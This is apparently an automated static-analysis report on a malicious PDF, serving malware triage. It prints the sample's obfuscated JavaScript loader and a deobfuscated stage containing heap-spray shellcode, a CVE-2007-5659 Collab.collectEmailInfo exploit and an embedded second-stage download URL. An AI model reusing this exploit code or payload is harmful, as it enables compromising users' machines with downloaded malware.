Malicious PDF — malware analysis report

Static analysis result for SHA-256 a84f782090f923e3…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 454b52778e1d52f7a0ece9679df8189e SHA-1: 89f18e615144871ba89feaa9cd4bb649c8f6a1f4 SHA-256: a84f782090f923e3027df14b77e377450f6ebf370df2f0078d416e355b3ad771
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_EVAL heuristic firing suggests that the JavaScript is obfuscated and likely uses eval() to execute its content. This script, named 'javascript_obj0013_001.js', is the primary artifact. The obfuscated nature of the script prevents a definitive analysis of its exact payload, but it is highly probable that it is intended to download and execute a second-stage malicious file. The confidence is reduced due to the obfuscation preventing a full analysis of the script's behavior.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function UObrao14q(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hA2eM(crgHSxoDdZNeiy){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(crgHSxoDdZNeiy)"+";"+"}");eval("function uwK3csJ3Gy(AkBuvo8kxTy){var Ds8w02sKzKp="+"0,J2mM1XFO3=AkBuvo8kxTy.l"+"en"+"gth,V6nbPpsNiU8u=10"+"2"+"4,AiWmg,vhRmUom34B5E,x3XZsP='',hu4VJ7Eqtvq=Ds8w02sKzKp,RIR87D00PEO=Ds8w02sKzKp,JRrxKGuw=Ds8w02sKzKp,fSU5hLxcCcFU4N=Ar"+"ra"+ …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://google-moogle.net/fiesta/load.php?id=42&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x367 6378 bytes
SHA-256: 50187a219454e811b602dc518fb1288e1ad531e3f6648744fea2e4f56073f381
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 138 of 229 identifiers look randomly generated (e.g. 'FC8FTg77dvxaC98dfdrFVK8BCh32VK8BCh3642gT'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function UObrao14q(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hA2eM(crgHSxoDdZNeiy){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(crgHSxoDdZNeiy)"+";"+"}");eval("function uwK3csJ3Gy(AkBuvo8kxTy){var Ds8w02sKzKp="+"0,J2mM1XFO3=AkBuvo8kxTy.l"+"en"+"gth,V6nbPpsNiU8u=10"+"2"+"4,AiWmg,vhRmUom34B5E,x3XZsP='',hu4VJ7Eqtvq=Ds8w02sKzKp,RIR87D00PEO=Ds8w02sKzKp,JRrxKGuw=Ds8w02sKzKp,fSU5hLxcCcFU4N=Ar"+"ra"+"y(63,20,0,41,18,57,48,49,36,8,0,0,0,0,0,0,62,54,37,2,6,5,4,52,7,32,47,28,16,31,50,42,23,13,34,53,21,56,19,24,35,14,15,0,0,0,0,11,0,33,30,51,1,44,3,9,25,55,27,38,43,58,10,29,26,59,45,61,46,39,12,22,40,60,17);f"+"o"+"r(vhRmUom34B5E=M"+"at"+"h.c"+"ei"+"l(J2mM1XFO3/"+"V6nbPpsNiU8u)"+";vhRmUom34B5E>Ds8w02sKzKp;vhRmUom34B5E-"+"-){fo"+"r(AiWmg=Ma"+"th.m"+"in(J2mM1XFO3,V6nbPpsNiU8u);AiWmg>Ds8w02sKzKp;AiWmg-"+"-,J2mM1XFO3-"+"-){JRrxKGuw|"+"=(fSU5hLxcCcFU4N[AkBuvo8kxTy.cha"+"rCod"+"eAt(hu4VJ7Eqtvq+"+"+)-48])<"+"<RIR87D00PEO;if(RIR87D00PEO){x3XZsP+"+"=hA2eM"+"(105^JRrxKGuw&"+"2"+"5"+"5);JRrxKGuw>"+">="+"8;RIR87D00PEO-"+"="+"2;}el"+"se{RIR87D00PEO="+"6"+";}}"+"}return (x3XZsP);}var HWkgk01=implode('',['gsdC','j','8GF','HIB_6','xLY','IFa','w212ChBFT','go2fb8F','njedCLFFL','4B','GfK','KICo2IdH','8Ffkv2Z','kv','CFH','y','dDkv2','DmF8nuKN_Q','U7DEBFfDyTF9UL12B8Fg5','z2','21','2f','gE','8','nuKN_QU7DHT2','fH','ULH','d','vGwT7','IdMEd','CYFEL','4xNgu','y4fbez4','CzT4OKNgJGIH','j9EEg','3Nguy','4fbez41B8nuKN_QU7DH3dH_x','zH','j','26dY','F1wE7IdME','dCYF','Bzjd','81grd','f','o67DH88nuK','N_QU7D4BFE','gs2HHxLH2W6dgB','cZRF','EHQyT2cUaPdd1448GH9ez4L2VHpsz9avV_h','36Yg','zT4hEzwn8BCh','3Lwn','9T4MI','6Dgg4Yc','WRZxI','Swy','FBHzBFT','g77d','vxaC98','d','fd','r','F','VKGBwo3E','VKGBwo3EVKG','B','wo3EVK8S_eeCVKxBwKrCVKyS','P','O2E','VKFTwl2EVKFTwha','EVK6','N_p3EVK6','Nwo3','EVK6N','nJICVK64','1h7EVK','yN','_','exCV','KyN_','JyCVKFSnbsCVKGN_o7','CVK6N_eyCVKyTPey','CVK6RwxyCVK2S_M','SE','VKGSw','Jx','EV','K2S_','M','SEVKy','E_eUEVK6N_h3EVK6N_','eeCVKyTPeyCVKeC1h3EVKyE','wz5EV','K6CwxIEVK','8BPh3EVK6N_WaEVK6N_','eyCVKICnMs','EVK','eC1eeCVKU','BPz5EVKyEPW','aEVK8BPeIEVK6N_WsCVK','6','N_','ey','CVKICnMsE','VK','eC1eUE','VKxCnz5EVKITwKsCVK8BPjS','CV','K6N_','h','S','CVK6N_ey','CVKICnMsEVKeC1exE','VK','8','Twz5EV','K8S_jaE','VK8BP','zsC','VK','6','N_prC','VK','6','N','_eyCV','KICnMsEV','KeC1JyCV','KeE_z5EVK8','E','n','Ls','EVK8BPK','5','EVK6N','_j','dEV','K','6N_eyCV','KICnMs','E','VKIN_','JeCVK','GRPMsCVK2','Enj3CVKy','SPW7EVKyRPxICVK641h','sEVK6','N','_e','6CVKeCweyCV','K2','EnMsEV','Ky','TPOeCV','K6NnxICVK6C_z7E','VKy','TP','lyEVKyRPlIC','VK8BPl2EV','K6N','_MSEVK6','N_eyCVKFBPlyCVKyCPr2E','VK2S_','O8EVKUT1h5','E','VK6N_eyCVK','ySP','e','yCVKy','R','wxICV','Ke','EnMSEV','KeS_M3CVKySPly','CVKxN','_xICVKIT','w','z5EV','K6N_eyCVKeN_eyC','VKIC','nMSEVKFEPJeC','V','KeNPe','GCVKeCnMSEVK8','BPJU','EVK','6N_z7','CVK6N_eyCV','K','ICnexCVK','eT1Oy','CVKeRweyCVKxCwLaEV','KeT1zaC','VK6Nnxy','CVKFEnL5','EV','K6','N_eyC','VK2EnWBEVKyTP','O','yC','VK6Rw','xICVK6C_z7E','VKyTP','lyEVKy','RPl','I','CV','KI','N_h5','EVK6','N_','e','yCVK','FEPeyCV','KeR','P','eFEVKICnexC','VKGRnOeCVKeRnpSE','VKITwlxCV','KxN_LaCVKeRnlyCV','KIC','nMSEVKFEPJxEVKeNPeICVKeCnMSEVK8BPJU','EVK6N','_OxCVK6','N_ey','C','VK','6N_','z7EV','K2EnWBEVKyTPO','yC','VK','6RPx','ICVK64_z7EVKyTP','l','yEVKyRPlICVKyN_h5','E','VK','6N','_ey','CVKFE','P','e','y','CVKyTPW','BE','VKyN_x','ICVK6C_z7EVKyTPlyEVKyR','PlICVK6N_h5EVK','6N_e','yCVKIC_eyCVKe4_lG','EVK8E_e','xCVK8E_ex','CVK8E_','exC','VK8E_e','xCVK8','Bw','M3','CVKeCPeeCVKy','TPlxCV','K8T_','p7EVKe4_WEEVK8S_WB','EVKyTPlICVK','yTPh3EVK6RPLrEVKeNwMSEVKeC1exEVK2BnM','SEV','K','yTP','rxEV','KyCwLrCV','K','6R','nL5EV','KeC1W3CVK2','E1','MSEVK6RnOyCV','KGR','nW3CVKIN','PjsEVKGS','wx6CVK','e','B','n','exCVK','GRnl2EVK6','4w','W','dE','VK','yN_','K','aEVKI','T_r6EVK','6RPLrCVKeEwj7','CVK6RneeEVKIN_WSCVK','IE_','hSEVK','I','EwrGEV','K2EnlIEVK','e','CPhaCV','K','8TPMSEVKeCP','MS','EVK6RnOeCVKFE1prEVK6RwMS','EVKyTPx','GEVKyRw','l6EVKxSwexCVK','6Nn','M','SEVK6RnMSEVK','eC','wjaC','VK','e','T_l','eEVK6N_eUEVKIS','nh5EVKITwWaEV','KeC','nWBEVKIRwlG','C','VKI4wxeEVK6N','_xI','E','VKUTPMEEVKUTwb','SEVKe','S_paCVKy','BP','jsCVKyS_MsCVKyBn','M5E','VKeT_M7EVKyS_MS','CVKyBPMsCVKy','EPM3CV','Ky','E','_j','7CVKUTPM','7EVKySPjsCVKyEPMdEVKUTPb','3EVKeS_MaEVKyS','_M3CVKyTPMa','EVK','UTwj7','CVKUTw','ME','EVKyE1p','sCVKx','T_','MSE','VKxS','wpSEV','KUBwjsEVKy','BnbB','EVKx','T','PpSN42gT4MI6','Dga6g5W4DkUS_z','6VdzBFTgBTFoBTwhBTw','4BGH9ez40eI','CfvLD','u','efF','zrcHgzT4R8','cvkUfnWrEZz5z1HT2fH','U','LH','d8G','Lg','rB','1gs','dC','j','8FfDyTF9','UL','1gzT','49K4Yk8ag','bs4F','y1L1','gz14dsc','C','n','v62hKN','YL','FSYM91','w','zx','T1','2gT4M','I6D','g3Ngu','y4fbez41BFHH6IDnIL','Dv','FG4v7d1hd','Twv7d1','hdTw_d81g3Ng','uy4','fbez41B','Ffkv2Z','kvCFHydDk','v2D','mF','8n','u','KN','_QU7DEBFfD','y','TF','9UL','12gT4','MI6DgadHQyfn','5Gd','Cgz','T','4ddd','v','oxS','Ha','F','Nvr8BCq8Fzg','BTFoBT','whBTw2hFC','u8XghWRPJ','FdZEF','B1gsIdj81LMI','6Dgo4','2hQ2wb24HLG','Cn','1BB1uFLw','fIB','HIGdF','rI4','TW6zf0I','4Y','oII1uFL','wfIBH','IGdFrIRLCd1448','G','FHIB','_6xLYIFaw212Chgcgd','8S2W5d9','o2z','_xLV4','1','B8nuKN_QU7Dgg14R','8','cvkUfnWrEZz5z1','4BFEgz','z4Z67dnG','d2DKL','4','k27HLUdY','C6SH7y','2vdd144','8','GH9ez4d','K','CfWL4','dI2Nn','gzT4','98zDHsd2vU','df','jyf','fjxd','2DK6z','oWIYoe','d','2HU','L','L2gT','4dKCfWL4dI2Nng','z','T4dKCfWL4dI','2NnHrd','fh','12C','n6L','LDTV','_D','5','Lz','_rFL4B','G','H9ez4','z','WLw86RwgzT','4H6I','H','gaNDj','I','2','FdE6gvIdgE2C9lK8CdI','6DxGzLhd1','z','dKCfWL4','d','I2NnH3L29ed','noFFw2T12u62','D81','29IeNznF2CjI','4Hdr','EL2','gT42y','L4dE1F','D8','EgexBvh','zV4','1zT','4zBGVZB1L','dEadh','zC_p','gfwG8F','T1BF','wgsGVg','Eadh','zC','_p','gcwG','81TgrELg','TzEgEadhzC_p','gfwG81TgaE','L','2B','1ET81LzWLw86RwN8EQ','gzETg5T4Zs14z','WLw86RwNIEQgTT4Wd','14T','1z4dEadhzC_p','gVw','G81Tg','5E','L2B','8FgBcZRFEHQyT2cUaPd','d','81gsdC','j','81HF','yd','FC8FTg77dvxaC98dfdrFVK8BCh32VK8BCh3642gT4bF22E6','LLoL6HL96zE','66dYGz2gTT4oS','E','1KrELg','SddM2a2ggFTgSddM2a24B1Hd','2','IDH','3','IdE','12','C_x','VHDed','fgzT4OWLdEI6','C','H3','IdE12','fnGd_FI22E2NdZW','L','L','4','xdH','_','v61g','rG4Ez','IDYvT4oL6','HL92','E2gT41','8FEgh','CFM2aHU9','2PM','Fcf6','FFL4d']);");eval(uwK3csJ3Gy(HWkgk01));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x367 2572 bytes
SHA-256: 833b5fbd48cfdc0b42f6660e33621be552d13e9147a32aec57af13eebd346194
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var zn1GYcPIx3ila0 = new Array(); function eOjUOJynvqOjqS(CNNFdwr, eo6xag8) { while (CNNFdwr.length*2<eo6xag8){CNNFdwr += CNNFdwr;} CNNFdwr = CNNFdwr.substring(0,eo6xag8/2); return CNNFdwr; } function PVK8ud6hZw7() { var yYt3vHHZD0cR = 0x0c0c0c0c; var KPZOWA12U8w8 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3234%u7326%u6C70%u343D"); var aNPOpO7FxUl8 = 0x400000; var VbcjjpNRy8Rv = KPZOWA12U8w8.length * 2; var eo6xag8 = aNPOpO7FxUl8 - (VbcjjpNRy8Rv+0x38); var CNNFdwr = unescape("%u9090%u9090"); CNNFdwr = eOjUOJynvqOjqS(CNNFdwr, eo6xag8); var qudVAPta = (yYt3vHHZD0cR - 0x400000)/aNPOpO7FxUl8; for (var Nh0j1wItyDA=0;Nh0j1wItyDA<qudVAPta;Nh0j1wItyDA++) { zn1GYcPIx3ila0[Nh0j1wItyDA] = CNNFdwr + KPZOWA12U8w8; } } function OyvywQk5vXfY() { var hNeqMlIIB = app.viewerVersion.toString(); hNeqMlIIB = hNeqMlIIB.replace(/\D/g,""); var xo0ME3 = new Array(hNeqMlIIB.charAt(0),hNeqMlIIB.charAt(1),hNeqMlIIB.charAt(2)); if ((xo0ME3[0] == 8 && ((xo0ME3[1] == 1 && xo0ME3[2] < 2) || xo0ME3[1] < 1)) || (xo0ME3[0] == 7 && xo0ME3[1] < 1) || (xo0ME3[0] < 7)) { PVK8ud6hZw7(); var tmvyk = unescape("%u0c0c%u0c0c"); while(tmvyk.length < 44952) tmvyk += tmvyk; this.collabStore = Collab.collectEmailInfo({subj: "",msg: tmvyk}); } } OyvywQk5vXfY();

Open this report in the interactive analyzer, or submit your own file for analysis.